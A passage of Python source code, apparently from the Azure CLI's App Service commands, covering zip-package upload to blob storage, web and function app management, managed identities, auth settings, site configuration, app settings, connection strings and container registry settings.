blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
